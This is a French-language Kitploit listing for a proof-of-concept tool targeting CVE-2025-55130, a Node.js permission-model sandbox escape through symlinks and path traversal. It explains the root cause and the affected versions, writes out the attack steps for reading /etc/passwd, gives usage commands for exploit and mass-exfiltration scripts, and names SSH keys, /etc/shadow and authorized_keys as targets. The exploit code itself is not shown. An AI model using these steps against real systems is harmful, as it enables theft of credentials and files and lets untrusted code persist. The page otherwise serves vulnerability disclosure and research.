Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55130 — POC pour CVE-2025-55130 | Kitploit
Outils/GitHubGitHub/scumfrog/cve-2025-55130
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExfiltration de DonnéesSécurité WebÉvasion de Conteneur
GitHubscumfrog/cve-2025-55130

CVE-2025-55130

POC pour CVE-2025-55130

Voir le dépôt
14il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55130 - Échappement de modèle de permission Node.js par symlink

root@kitploit:~
   ___ _   _ ___     ____   ___ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Node.js Permission Model Bypass via Crafted Symlinks
                   [ Découvert par natann @ JFrog ]

Aperçu

Une faille de traversal de chemin dans Node.js permet de sortir des restrictions de permission --allow-fs-read et --allow-fs-write en utilisant des symlinks pointant vers des chemins absolus combinés à une traversal relative.

La vérification de permission et la résolution de chemin se produisent séparément. Une fois que le chemin initial passe la vérification de permission, le symlink est suivi et les séquences de traversal échappent au sandbox.

Versions affectées

Branche

Analyse technique

Cause racine

root@kitploit:~
Permission Check:  ./nested/dirs/symlink/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^ ALLOWED (starts with ./)
                   
Path Resolution:   /actual/path/to/script/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                   Resolves to /etc/passwd - OUTSIDE SANDBOX

Le modèle de permission valide la chaîne de chemin avant la résolution du symlink. En créant un symlink vers un chemin absolu et en utilisant une traversal ../ APRÈS le symlink, nous sortons du répertoire autorisé.

Flux d'attaque

root@kitploit:~
1. mkdir -p ./a/b/c/d/e/f/g           # Créer des répertoires imbriqués dans le chemin autorisé
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # Symlink vers un chemin absolu  
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         La vérification de permission réussit (dans ./)
         
   Après résolution du symlink :
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   La traversal échappe à la racine

Fichiers

FichierObjectif
exploit.jsExploit principal - lire des fichiers arbitraires
exploit_write.js

Utilisation

root@kitploit:~
# Basic exploitation
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# Check if vulnerable
node check.js

# Mass exfil
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js

Impact

  • Lire des fichiers sensibles : /etc/passwd, /etc/shadow, clés SSH, configurations
  • Écrire des fichiers arbitraires : tâches cron, authorized_keys, configurations
  • Échappement de conteneur dans des environnements multi-locataires
  • Contournement du sandbox pour exécution de code non fiable

Références

  • https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
  • https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55130

Crédits

  • Vulnérabilité : Natan Nehorai (natann) @ JFrog Security Research
  • Correction : RafaelGSS @ Node.js

Pour recherche et tests autorisés uniquement.

Télécharger l’outil
Vulnérable
Corrigée
20.x< 20.20.020.20.0
22.x< 22.22.022.22.0
24.x< 24.13.024.13.0
25.x< 25.3.025.3.0
Écrire des fichiers arbitraires
exfil.jsExfiltration massive de fichiers
check.jsVérification de vulnérabilité de version